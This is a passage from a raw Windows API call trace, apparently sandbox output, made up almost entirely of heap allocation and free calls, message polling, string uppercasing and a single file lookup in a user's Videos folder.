Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0212.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0212.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.378] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.382] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/dbFeToW6SZRYrK03.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf59c0, ftCreationTime.dwHighDateTime=0x1d5cff7, ftLastAccessTime.dwLowDateTime=0xc30b7b30, ftLastAccessTime.dwHighDateTime=0x1d5d0e7, ftLastWriteTime.dwLowDateTime=0xc30b7b30, ftLastWriteTime.dwHighDateTime=0x1d5d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x1770b, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbFeToW6SZRYrK03.flv", cAlternateFileName="DBFETO~1.FLV")) returned 0x9e2238 [0212.383] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0212.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0212.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.385] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.386] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.387] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.387] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.387] HeapFree (in: 